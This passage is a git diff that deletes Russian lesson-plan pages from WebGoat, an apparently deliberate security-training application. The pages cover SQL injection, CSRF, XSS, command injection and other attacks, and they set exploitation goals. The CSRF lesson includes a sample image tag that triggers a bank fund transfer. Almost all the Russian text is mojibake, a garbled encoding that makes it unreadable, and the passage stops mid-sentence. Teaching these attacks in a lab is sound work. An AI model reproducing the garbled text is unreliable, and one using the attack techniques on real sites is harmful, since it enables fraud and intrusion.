Ðазвание урока: ИÑпользование матрицы ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»Ñ Ð´Ð¾Ñтупа
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ð’ Ñхемах оÑнованных на ролÑÑ… Ñама роль предÑтавлÑет из ÑÐµÐ±Ñ Ð½Ð°Ð±Ð¾Ñ€ разрешений доÑтупа и привилегий.
-Пользователю одновременно может быть приÑвоена одна или более ролей.
-Подобные Ñхемы чаще вÑего включают в ÑÐµÐ±Ñ Ð´Ð²Ð° механизма: механизм работы Ñ Ñ€Ð°Ð·Ñ€ÐµÑˆÐµÐ½Ð¸Ñми доÑтупа и
-механизм Ð½Ð°Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ñ Ð¿Ñ€Ð¸Ð²Ð¸Ð»ÐµÐ³Ð¸Ð¹. Ð’ ÑлучаÑÑ… когда Ñ€ÐµÐ°Ð»Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð´Ð°Ð½Ð½Ð¾Ð¹ Ñхемы имеет какие-то изъÑны пользователь может получить
-доÑтуп к функционалу, к которому ему обращатьÑÑ Ð½Ðµ разрешено. Или он может каким-либо образом повыÑить Ñвои
-привилегии в приложении.
-ОÑновные цели и задачи:
-Каждый пользователь имеет Ñвою роль(и), наличие которой позволÑет ему получать доÑтуп к Ñтрого определённым реÑурÑам.
-Вашей целью ÑвлÑетÑÑ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ðµ механизма Ñ€Ð°Ð·Ð³Ñ€Ð°Ð½Ð¸Ñ‡ÐµÐ½Ð¸Ñ Ð´Ð¾Ñтупа на данном Ñайте и поиÑк в нём изъÑнов.
-Только пользователи из группы [Admin] должны иметь доÑтуп к разделу ÑƒÐ¿Ñ€Ð°Ð²Ð»ÐµÐ½Ð¸Ñ Ð°ÐºÐºÐ°ÑƒÐ½Ñ‚Ð°Ð¼Ð¸.
-
diff --git a/src/main/webapp/lesson_plans/ru/BackDoors.html b/src/main/webapp/lesson_plans/ru/BackDoors.html
deleted file mode 100644
index 0769f43b2..000000000
--- a/src/main/webapp/lesson_plans/ru/BackDoors.html
+++ /dev/null
@@ -1,23 +0,0 @@
-
-
Ðазвание урока: Как оÑущеÑтвлÑетÑÑ Ð¿Ð¾Ð¼ÐµÑ‰ÐµÐ½Ð¸Ðµ вредоноÑных конÑтрукций в БД.
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Помещение вредоноÑных конÑтрукций в БД
-
-
-
-Как работает данный вид атаки:
-
-База данных обычно иÑпользуетÑÑ ÐºÐ°Ðº backend веб-приложений в качеÑтве хранилища важных данных. Ð’ процеÑÑе атаки злоумышленник
-может помещать в неё различные вредоноÑные конÑтрукции, например опаÑные триггеры. Триггеры вызываютÑÑ
-каждый раз при выполнении базой определённой операции (выборка, вÑтавка, обновление данных и Ñ‚.д.). Ðапример атакующий
-может Ñоздать триггер который будет у вÑех региÑтрирующихÑÑ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¹ менÑть почтовые адреÑа на подконтрольный ему email.
-
-ОÑÐ½Ð¾Ð²Ð½Ð°Ñ Ñ†ÐµÐ»ÑŒ(и):
-
-* Ð’Ñ‹ должны понÑть как Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ ÑкÑплуатации уÑзвимого запроÑа Ñоздать триггер
-* У Ð²Ð°Ñ Ð½Ðµ получитÑÑ Ñоздать в данном приложении наÑтоÑщий вредоноÑный триггер Ñ‚.к. БД иÑÐ¿Ð¾Ð»ÑŒÐ·ÑƒÐµÐ¼Ð°Ñ WebGoat`ом не поддерживает триггеров.
-* Ваш ID Ð´Ð»Ñ Ð²Ñ…Ð¾Ð´Ð° - 101.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/BasicAuthentication.html b/src/main/webapp/lesson_plans/ru/BasicAuthentication.html
deleted file mode 100644
index fe1d9afeb..000000000
--- a/src/main/webapp/lesson_plans/ru/BasicAuthentication.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Ðазвание урока: ОÑÐ½Ð¾Ð²Ð½Ð°Ñ Ð°ÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-ОÑÐ½Ð¾Ð²Ð½Ð°Ñ Ð°ÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð¸ÑпользуетÑÑ Ð´Ð»Ñ Ð·Ð°Ñ‰Ð¸Ñ‚Ñ‹ реÑурÑов раÑположенных на Ñтороне Ñервера.
-При получении запроÑа от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð²ÐµÐ±-Ñервер отправлÑет ему ответ Ñ ÐºÐ¾Ð´Ð¾Ð¼ 401.
-Получив его браузер запрашивает у Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð»Ð¾Ð³Ð¸Ð½ и пароль в Ñпециальном диалоговом окне. ПоÑле
-ввода браузер кодирует полученные данные по алгоритму base64 и отÑылает веб-Ñерверу.
-ПоÑледний, в Ñвою очередь, проверÑет полученную информацию и, еÑли вÑÑ‘ правильно, отдаёт клиенту запрашиваемый
-документ. Указанные пользователем данные далее автоматичеÑки отÑылаютÑÑ Ð±Ñ€Ð°ÑƒÐ·ÐµÑ€Ð¾Ð¼ при каждом обращении к
-защищённым реÑурÑам.
-
-ОÑÐ½Ð¾Ð²Ð½Ð°Ñ Ñ†ÐµÐ»ÑŒ(и):
-Ðа Ñтом уроке вашей целью ÑвлÑетÑÑ Ð¿Ð¾Ð½Ð¸Ð¼Ð°Ð½Ð¸Ðµ механизмов оÑновной аутентификации и ответ на вопроÑÑ‹ которые находÑÑ‚ÑÑ Ð½Ð¸Ð¶Ðµ.
-
diff --git a/src/main/webapp/lesson_plans/ru/BlindSqlInjection.html b/src/main/webapp/lesson_plans/ru/BlindSqlInjection.html
deleted file mode 100644
index 629a396cc..000000000
--- a/src/main/webapp/lesson_plans/ru/BlindSqlInjection.html
+++ /dev/null
@@ -1,25 +0,0 @@
-
-
Ðазвание темы: ИÑпользование Ñлепых SQL-инъекций
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-SQL-инъекции предÑтавлÑÑŽÑ‚ Ñерьёзную опаÑноÑть Ð´Ð»Ñ Ñайтов, Ñ‡ÑŒÑ Ñ€Ð°Ð±Ð¾Ñ‚Ð° оÑновываетÑÑ Ð½Ð° БД.
-Методы оÑущеÑÑ‚Ð²Ð»ÐµÐ½Ð¸Ñ Ñ‚Ð°ÐºÐ¸Ñ… атак очень проÑты в оÑвоении и ущерб наноÑимый ими Ð½ÐµÐ»ÑŒÐ·Ñ Ð½ÐµÐ´Ð¾Ð¾Ñ†ÐµÐ½Ð¸Ð²Ð°Ñ‚ÑŒ Ñ‚.к. злоумышленник
-Ñ Ð¸Ñ… помощью в некоторых ÑлучаÑÑ… может добитьÑÑ Ð¿Ð¾Ð»Ð½Ð¾Ð¹ компрометации ÑиÑтемы.
-ÐеÑÐ¼Ð¾Ñ‚Ñ€Ñ Ð½Ð° вÑÑŽ опаÑноÑть SQL-инъекций каждый день поÑвлÑетÑÑ Ð¼Ð½Ð¾Ð¶ÐµÑтво уÑзвимых к ним веб-приложений.
-
-Ðа Ñамом деле ÑÐµÐ¹Ñ‡Ð°Ñ Ð¾Ð¿Ð°ÑноÑть данного вида уÑзвимоÑтей Ñильно преувеличивают. ЕÑть множеÑтво ÑпоÑобов Ð±Ð»Ð°Ð³Ð¾Ð´Ð°Ñ€Ñ ÐºÐ¾Ñ‚Ð¾Ñ€Ñ‹Ð¼
-любой разработчик практичеÑки полноÑтью может защитить Ñвоё приложение от них.
-Вообще проверка вÑех входÑщих данных ÑвлÑетÑÑ Ð¾Ñ‡ÐµÐ½ÑŒ хорошей практикой не только при работе Ñ Ð‘Ð”, но и
-в ÑлучаÑÑ… Ñ Ð²Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð¸ÐµÐ¼ команд ОС, Ñкриптов и Ñ‚.д.
-
-
-
-Ð“Ð»Ð°Ð²Ð½Ð°Ñ Ñ†ÐµÐ»ÑŒ(и):
-Форма, раÑÐ¿Ð¾Ð»Ð¾Ð¶ÐµÐ½Ð½Ð°Ñ Ð½Ð¸Ð¶Ðµ, позволÑет пользователю вводить номер аккаунта и проверÑть дейÑтвителен он или нет.
-ВоÑпользуйтеÑÑŒ данной формой Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб через уÑзвимоÑть на Ñтороне Ñервера получить
-возможноÑть извлекать произвольные данные из БД.
- Ascii-Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ñ Ñимволов которые могут вам понадобитьÑÑ: 'A' = 65 'Z' = 90 'a' = 97 'z' = 122
- Целью ÑвлÑетÑÑ Ð¿Ð¾Ð»ÑƒÑ‡ÐµÐ½Ð¸Ðµ Ñодержимого Ð¿Ð¾Ð»Ñ first_name в таблице user_data Ð´Ð»Ñ Ð·Ð°Ð¿Ð¸Ñи Ñ Ð½Ð¾Ð¼ÐµÑ€Ð¾Ð¼ 15613.
-ПомеÑтите его Ð¸Ð¼Ñ Ð² Ñту форму Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб закончить урок.
diff --git a/src/main/webapp/lesson_plans/ru/BufferOverflow.html b/src/main/webapp/lesson_plans/ru/BufferOverflow.html
deleted file mode 100644
index 272298787..000000000
--- a/src/main/webapp/lesson_plans/ru/BufferOverflow.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Ðазвание урока: ÐкÑÐ¿Ð»ÑƒÐ°Ñ‚Ð°Ñ†Ð¸Ñ ÑƒÑзвимоÑтей Ð¿ÐµÑ€ÐµÐ¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ Ð±ÑƒÑ„Ñ„ÐµÑ€Ð°
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Как проводить ÑкÑплуатацию уÑзвимоÑтей Ð¿ÐµÑ€ÐµÐ¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ Ð±ÑƒÑ„Ñ„ÐµÑ€Ð°.
-ОÑновные цели и задачи:
-Ð”Ð»Ñ Ð´Ð°Ð½Ð½Ð¾Ð³Ð¾ урока требуетÑÑ Ð°Ð²Ñ‚Ð¾Ñ€.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/CSRF.html b/src/main/webapp/lesson_plans/ru/CSRF.html
deleted file mode 100644
index 47e23b65e..000000000
--- a/src/main/webapp/lesson_plans/ru/CSRF.html
+++ /dev/null
@@ -1,40 +0,0 @@
-
-
Ðазвание урока: Проведение атак межÑайтовой подделки запроÑов.
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Ðа данном уроке вы научитеÑÑŒ иÑпользовать уÑзвимоÑти межÑайтовой подделки запроÑов (CSRF).
-
-
-
-Как работает данный тип атак:
-
-При проведении атак межÑайтовой подделки запроÑов жертву заÑтавлÑÑŽÑ‚ каким-либо образом
-загрузить Ñтраницу Ñодержащую опаÑную картинку, типа той что предÑтавлена ниже:
-
-
<img src="http://www.mybank.com/sendFunds.do?acctId=123456 "/>
-
-Когда браузер жертвы обрабатывает такую Ñтраницу, он автоматичеÑки Ñовершает обращение
-к Ñайту www.mybank.com, к Ñкрипту transferFunds.do Ð¿ÐµÑ€ÐµÐ´Ð°Ð²Ð°Ñ Ð½ÐµÐ¾Ð±Ñ…Ð¾Ð´Ð¸Ð¼Ñ‹Ð¹ злоумышленнику параметр.
-Браузер будет думать что Ñто проÑтое изображение, тогда как на Ñамом деле обращение к Ñтому
-адреÑу вызовет перевод денег.
-
-ВмеÑте Ñ Ð·Ð°Ð¿Ñ€Ð¾Ñом, уходÑщим на Ñайт банка, будут переданы и cookies клиента. Следовательно,
-еÑли в Ñтот момент пользователь будет авторизирован на www.mybank.com, и в его cookies будет хранитÑÑ
-идентификатор активной ÑеÑÑии, Ñкрипт transferFunds.do примет Ñтот Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð·Ð° легитимный и
-Ñовершит необходимую злоумышленнику операцию.
-
-Таким образом, атакующий может производить практичеÑки вÑе дейÑтвиÑ, которые ÑпоÑобен делать
-наÑтоÑщий пользователь.
-
-ОÑновные цели и задачи:
-
-Ваша цель - поÑлать в новоÑтную группу пиÑьмо, Ñодержащее в Ñебе изображение Ñо
-Ñпециально Ñформированным адреÑом. Картинка должна иметь размер 1*1px и производить
-CSRF-атаку, заÑтавлÑÑ Ð±Ñ€Ð°ÑƒÐ·ÐµÑ€ обращатьÑÑ Ðº текущей Ñтранице, но Ñ Ð´Ð¾Ð¿Ð¾Ð»Ð½Ð¸Ñ‚ÐµÐ»ÑŒÐ½Ñ‹Ð¼ параметром
-в URL - "transferFunds=4000". Когда вы отошлёте Ñообщение и оно отобразитÑÑ Ð½Ð° Ñкране,
-браузер автоматичеÑки оÑущеÑтвит необходимый запроÑ. Как только вы решили что выполнили Ñто задание
-проÑто обновите Ñтраницу. ЕÑли вÑÑ‘ Ñделано верно, то в главном меню, на против ÑоответÑтвующего урока,
-поÑвитÑÑ Ð·ÐµÐ»Ñ‘Ð½Ð°Ñ Ð¾Ñ‚Ð¼ÐµÑ‚ÐºÐ°.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/ChallengeScreen.html b/src/main/webapp/lesson_plans/ru/ChallengeScreen.html
deleted file mode 100644
index b3d9b3321..000000000
--- a/src/main/webapp/lesson_plans/ru/ChallengeScreen.html
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
Lesson Plan Title: Putting it all together
-
-Concept / Topic To Teach:
-This lesson creates a challenge that will help the student apply all that they have learned.
-General Goal(s):
-Display the secret message.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/ClientSideFiltering.html b/src/main/webapp/lesson_plans/ru/ClientSideFiltering.html
deleted file mode 100644
index 1fa409480..000000000
--- a/src/main/webapp/lesson_plans/ru/ClientSideFiltering.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Ðазвание урока: Ð¤Ð¸Ð»ÑŒÑ‚Ñ€Ð°Ñ†Ð¸Ñ Ð´Ð°Ð½Ð½Ñ‹Ñ… на Ñтороне клиента
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ð’Ñегда ÑчитаетÑÑ Ñ…Ð¾Ñ€Ð¾ÑˆÐµÐ¹ практикой отправлÑть на Ñторону клиента только ту информацию, доÑтуп к которой он имеет.
-Ð’ данном уроке на Ñторону клиента будет отправлено очень много информации, что ÑоздаÑÑ‚ Ñерьёзные проблемы Ñ ÐºÐ¾Ð½Ñ‚Ñ€Ð¾Ð»ÐµÐ¼ доÑтупа к ней.
-
-ОÑновные цели и задачи:
-Ваша цель ÑоÑтоит в том, чтоб Ñреди принимаемых Ñо Ñтороны Ñервера данных найти ту
-информацию, доÑтупа к которой у Ð²Ð°Ñ Ð½ÐµÑ‚.
diff --git a/src/main/webapp/lesson_plans/ru/ClientSideValidation.html b/src/main/webapp/lesson_plans/ru/ClientSideValidation.html
deleted file mode 100644
index ccc490f83..000000000
--- a/src/main/webapp/lesson_plans/ru/ClientSideValidation.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Ðазвание урока: Insecure Client Storage
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Хорошей практикой ÑвлÑетÑÑ Ð¿Ñ€Ð¾Ð²ÐµÑ€ÐºÐ° на Ñтороне Ñервера абÑолютно вÑех принимаемых данных.
-Ð ÐµÐ°Ð»Ð¸Ð·Ð°Ñ†Ð¸Ñ Ð¼ÐµÑ…Ð°Ð½Ð¸Ð·Ð¼Ð¾Ð² проверки только на Ñтороне клиента делает приложение уÑзвимым.
-Запомните, вÑÑ‘ что отправлÑетÑÑ Ð½Ð° Ñторону клиента не должно Ñодержать критичеÑки важных
-данных или механизмов.
-
-ОÑновные цели:
-Ð’ данном упражнении Ð¿ÐµÑ€Ð²Ð°Ñ Ð²Ð°ÑˆÐ° задача - обнаружить дейÑтвующий код купона обеÑпечивающего Ñкидку.
-Далее необходимо иÑÑледовать механизм проверки вводимых данных и добитьÑÑ Ð¿Ð¾ÐºÑƒÐ¿ÐºÐ¸ товара за нулевую цену.
-
diff --git a/src/main/webapp/lesson_plans/ru/CommandInjection.html b/src/main/webapp/lesson_plans/ru/CommandInjection.html
deleted file mode 100644
index f30ac8a45..000000000
--- a/src/main/webapp/lesson_plans/ru/CommandInjection.html
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
Ðазвание урока: ИÑпользование инъекций команд
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Ðтаки клаÑÑа "Ð˜Ð½ÑŠÐµÐºÑ†Ð¸Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´" предÑтавлÑÑŽÑ‚ Ñобой Ñерьёзную угрозу Ð´Ð»Ñ Ñайтов принимающих
-от пользователей какие-либо данные. Методика их иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð´Ð¾Ñтаточно тривиальна, но в тоже
-Ð²Ñ€ÐµÐ¼Ñ Ð¾Ð½Ð¸ могут приводить к полной компрометации атакованной ÑиÑтемы. ÐеÑÐ¼Ð¾Ñ‚Ñ€Ñ Ð½Ð° Ñто количеÑтво
-приложений имеющих подобные уÑзвимоÑти неуклонно раÑтёт.
-Ðа Ñамом деле подобные угрозы могут быть полноÑтью уÑтранены Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ принÑÑ‚Ð¸Ñ Ñ€Ð°Ð·Ñ€Ð°Ð±Ð¾Ñ‚Ñ‡Ð¸ÐºÐ°Ð¼Ð¸
-проÑтейших мер направленных на обеÑпечение безопаÑноÑти приложениÑ. Ð’ данном уроке
-будет продемонÑтрированно множеÑтво примеров Ð¿Ñ€Ð¾Ð²ÐµÐ´ÐµÐ½Ð¸Ñ Ð¸Ð½ÑŠÐµÐºÑ†Ð¸Ð¹ через поÑтупающие
-из вне параметры.
-Запомните что проверка вÑех получаемых от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð°Ð½Ð½Ñ‹Ñ…, оÑобенно тех, которые будут иÑпользоватьÑÑ
-в командах ОС, Ñкриптах или запроÑах к БД, ÑвлÑетÑÑ Ñ…Ð¾Ñ€Ð¾ÑˆÐµÐ¹ практикой
-
-ОÑновные цели и задачи:
-Попробуйте найти уÑзвимоÑть через которую можно выполнить какую-нибудь команду операционной ÑиÑтемы.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/ConcurrencyCart.html b/src/main/webapp/lesson_plans/ru/ConcurrencyCart.html
deleted file mode 100644
index 1ddbda659..000000000
--- a/src/main/webapp/lesson_plans/ru/ConcurrencyCart.html
+++ /dev/null
@@ -1,31 +0,0 @@
-
-
-
-
-
- План урока
-
-
-
-
-
Ðазвание урока: УÑзвимоÑть при одновременной работе Ñ Ñ‚Ð¾Ð²Ð°Ñ€Ð½Ð¾Ð¹ корзиной
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Веб-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¼Ð¾Ð³ÑƒÑ‚ обрабатывать множеÑтво HTTP-запроÑов одновременно.
-ЧаÑто разработчики иÑпользуют конÑтрукции не приÑпоÑобленные к многопоточной работе, и
-Ñто Ñоздаёт возможноÑть иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¾ÑˆÐ¸Ð±Ð¾Ðº ÑвÑзанных Ñ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ñ‹Ð¼Ð¸ обращениÑми.
-Ðапример когда одна и та же Ñтраница открываетÑÑ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ð¾ разными пользователÑми и один их них видит
-на ней данные другого.
-Под приÑпоÑобленноÑтью к многопоточной работе подразумеваетÑÑ ÑпоÑобноÑть полей клаÑÑов и объектов
-вÑегда находитьÑÑ Ð² верном ÑоÑтоÑнии при выполнении множеÑтва одних и тех же операций вызываемых
-разными потоками. ПоÑкольку вÑе потоки иÑпользуют одно и то же рабочее проÑтранÑтво вызываемых методов, и в данном
-проÑтранÑтве хранÑÑ‚ÑÑ Ð´Ð°Ð½Ð½Ñ‹Ðµ вÑех ÑвойÑтв отдельно взÑтых клаÑÑов, то множеÑтвенные одновременные попытки
-обращений к ним могут привеÑти к неожиданным результатам.
-
-ОÑновные цели:
-Ваша цель - проÑкÑплуатировать уÑзвимоÑть Ñтого типа Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб получить возможноÑть покупать товары по заниженной цене.
-
-
-
diff --git a/src/main/webapp/lesson_plans/ru/CrossSiteScripting.html b/src/main/webapp/lesson_plans/ru/CrossSiteScripting.html
deleted file mode 100644
index 1784101e1..000000000
--- a/src/main/webapp/lesson_plans/ru/CrossSiteScripting.html
+++ /dev/null
@@ -1,21 +0,0 @@
-
-
Ðазвание урока: Как проводить атаки межÑайтового Ñкриптинга (XSS)
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Хорошей практикой вÑегда ÑчиталаÑÑŒ очиÑтка вÑех входÑщих данных, оÑобенно когда
-их Ñодержимое будут иÑпользовано в качеÑтве команд ОС, Ñкриптов или запроÑов к
-БД. Ðто важно и Ð´Ð»Ñ Ñ‚ÐµÑ… данных, которые будут Ñохранены где-то
-внутри приложениÑ. ПоÑетители не должны иметь возможноÑть публикации на Ñайте
-таких Ñообщений, которые могут изменÑть Ñтруктуру Ñтраницы при их проÑмотре.
-
-XSS также может возникнуть когда Ð²Ð²ÐµÐ´Ñ‘Ð½Ð½Ð°Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¼ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ñразу же,
-без вÑÑчеÑких проверок, помещаетÑÑ Ð² HTTP-запроÑ, но не ÑохранÑетÑÑ Ð²Ð½ÑƒÑ‚Ñ€Ð¸ приложениÑ
-(отражаемые XSS). Ð’ таких ÑлучаÑÑ… нападающий может Ñформировать URL, Ñодержащий в Ñебе
-вредоноÑный код и передать его жертве(ам) через Ñторонний веб-Ñайт, почту или любым другим ÑпоÑобом.
-
-ОÑновные цели и задачи:
-Ðа данном уроке вы научитеÑÑŒ иÑпользовать хранимые и отражаемые XSS-уÑзвимоÑти.
-Ð’ конце вам придётÑÑ Ð²Ð½ÐµÑти Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ Ð² код Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð´Ð»Ñ ÑƒÑÑ‚Ñ€Ð°Ð½ÐµÐ½Ð¸Ñ Ð´Ð°Ð½Ð½Ñ‹Ñ… уÑзвимоÑтей.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/CsrfPromptByPass.html b/src/main/webapp/lesson_plans/ru/CsrfPromptByPass.html
deleted file mode 100644
index 3223bc3cb..000000000
--- a/src/main/webapp/lesson_plans/ru/CsrfPromptByPass.html
+++ /dev/null
@@ -1,31 +0,0 @@
-
-
Ðазвание урока: CSRF, обход мезанизмов подтверждений
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Ðа данном уроке вы научитеÑÑŒ проводить CSRF-Ð½Ð°Ð¿Ð°Ð´ÐµÐ½Ð¸Ñ Ð² обход механизмов Ð¿Ð¾Ð´Ñ‚Ð²ÐµÑ€Ð¶Ð´ÐµÐ½Ð¸Ñ Ð¾Ð¿ÐµÑ€Ð°Ñ†Ð¸Ð¹.
-
-
-
-Как работает данный клаÑÑ Ð°Ñ‚Ð°Ðº:
-
-CSRF ÑвлÑетÑÑ Ñ‚Ð°ÐºÐ¸Ð¼ видом атак, при проведении которых браузер жертвы, без её ведома, отправлÑет
-на целевой Ñайт запроÑÑ‹ нужные злоумышленнику. Иногда, при проведении важных операций, Ñервер может
-запроÑить у Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð¸Ñ… подтверждение. Ðтот ход может показатьÑÑ Ñ€ÐµÑˆÐµÐ½Ð¸ÐµÐ¼ проблем ÑвÑзанных Ñ CSRF,
-но только не в ÑлучаÑÑ… когда подтверждение реализовано ÑредÑтвами JavaScript. Ðа данном уроке вы научитеÑÑŒ
-обходить такие варианты подтверждений, как одиночных, так и многочиÑленных. Решением будет ÑвлÑтьÑÑ Ñ‚Ð° же поÑылка
-поддельных запроÑов, но уже не одного, а неÑкольких.
-
-
-
-
-Цели и задачи:
-
-Как и в прошлом уроке, вашей целью ÑвлÑетÑÑ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ° Ñлектронного пиÑьма в новоÑтную группу. ПиÑьмо, при проÑмотре,
-должно вызывать отправку неÑкольких поддельных запроÑов: первый на оÑущеÑтвление денежного перевода, второй на
-его подтверждение. Сначала URL, по которому будет произведено обращение, должен Ñодержать параметр "transferFunds",
-равный "4000", затем его же, но Ñо значением "CONFIRM". ПоÑле того как Ñообщение отобразитÑÑ Ð½Ð° Ñкране, браузер любого
-кто его увидит Ñам Ñделает вÑÑ‘ что нужно. Ð’ конце работы обновите текущую Ñтраницу. ЕÑли задание выполнено верно, то в
-главном меню, на против Ñтого урока, поÑвитÑÑ Ð·ÐµÐ»Ñ‘Ð½Ð°Ñ Ð¾Ñ‚Ð¼ÐµÑ‚ÐºÐ°.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/CsrfTokenByPass.html b/src/main/webapp/lesson_plans/ru/CsrfTokenByPass.html
deleted file mode 100644
index f2e0de169..000000000
--- a/src/main/webapp/lesson_plans/ru/CsrfTokenByPass.html
+++ /dev/null
@@ -1,41 +0,0 @@
-
-
Ðазвание урока: Обход CSRF-защиты оÑнованной на токенах
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Ðа данном уроке вы научитеÑÑŒ оÑущеÑтвлÑть CSRF-Ð½Ð°Ð¿Ð°Ð´ÐµÐ½Ð¸Ñ Ð½Ð° Ñайты, иÑпользующие токены в качеÑтве защиты
-от CSRF-атак.
-
-
-
-Как работают Ñти атаки:
-
-
-CSRF-атаки заÑтавлÑÑŽÑ‚ браузер жертвы оÑущеÑтвлÑть необходимые злоумышленнику запроÑÑ‹
-к целевому Ñерверу в невидимом режиме. Ðто позволÑет атакующему вызывать выполнение различных операций
-от лица атакованного Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ñ ÐµÐ³Ð¾ правами и привилегиÑми.
-
-
ÐÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð·Ð°Ð¿Ñ€Ð¾Ñов принимаемых от поÑетителей, оÑÐ½Ð¾Ð²Ð°Ð½Ð½Ð°Ñ Ð½Ð° уникальных токенах, предотвращает
-возможноÑть CSRF-нападений. При иÑпользовании данной техники, при отправке важного запроÑа, Ñерверу
-передаётÑÑ ÑƒÐ½Ð¸ÐºÐ°Ð»ÑŒÐ½Ñ‹Ð¹ Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ клиента токен, наличие которого подтверждает его легитимноÑть.
-Проект OWASP CSRFGuard как раз иÑпользует такой подход, позволÑÑ Ð·Ð°Ñ‰Ð¸Ñ‚Ð¸Ñ‚ÑŒ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ñ‚ CSRF-нападений.
-
-
-
-Тем не менее, данный вид защиты можно обойти. Ð”Ð»Ñ Ñтого доÑтаточно обнаружить на атакуемом Ñайте XSS-уÑзвимоÑть.
-Её наличие поможет отправлÑть запроÑÑ‹ от имени жертвы, ведь ÑиÑтемы безопаÑноÑти вÑех браузеров,
-оÑнованных на политике одного иÑточника, не запрещают обращатьÑÑ Ðº текущему домену.
-
-
-
-ОÑновные цели и задачи:
-
-Как и в прошлом уроке, вашей целью ÑвлÑетÑÑ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ° пиÑьма в новоÑтную группу Ð´Ð»Ñ Ð²Ñ‹Ð·Ð¾Ð²Ð° нелегитимного
-перевода денег. Ð”Ð»Ñ ÐµÑ‘ доÑÑ‚Ð¸Ð¶ÐµÐ½Ð¸Ñ Ð²Ð°Ð¼ необходимо узнать дейÑтвующий токен. Он находитÑÑ Ð² коде Ñтраницы на
